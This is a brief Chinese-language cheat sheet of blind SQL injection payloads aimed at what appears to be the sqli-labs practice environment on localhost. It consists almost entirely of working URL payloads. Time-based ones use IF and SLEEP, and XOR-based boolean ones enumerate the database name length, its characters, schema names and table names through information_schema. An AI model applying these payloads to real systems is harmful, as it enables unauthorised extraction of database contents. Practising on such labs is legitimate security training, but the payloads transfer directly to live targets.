if语句结构
if(条件(),真(),假())
if(length(database())>10,sleep(3),1)
时间注入
库名长度:
http://localhost/sqli/Less-2/?id=1 and if(length(database())>8,sleep(3),1)--+
其他库长度:
http://localhost/sqli/Less-2/?id=1 and if(length((select schema_name from information_schema.schemata limit 0,1))=6,sleep(3),1)--+
求数据库名字符:
http://localhost/sqli/Less-2/?id=1 and if(ascii(substr(database(),1,1))>32,sleep(3),1)--+
表长度:
http://localhost/sqli/Less-2/?id=1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6,sleep(3),1)--+
剩下自行修改
异或 Xor
1'^(ascii(substr(database(),1,1))>32) --+
异或注入
库名长度:
http://localhost/sqli/Less-8/?id=1'^(length(database())>8) --+
其他库长度:
http://localhost/sqli/Less-2/?id=1'^(length((select schema_name from information_schema.schemata limit 0,1))=6)--+
求数据库名字符:
http://localhost/sqli/Less-8/?id=1'^(ascii(substr(database(),1,1))>32) --+
表长度:
http://localhost/sqli/Less-8/?id=1'^(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6) --+
剩下自行修改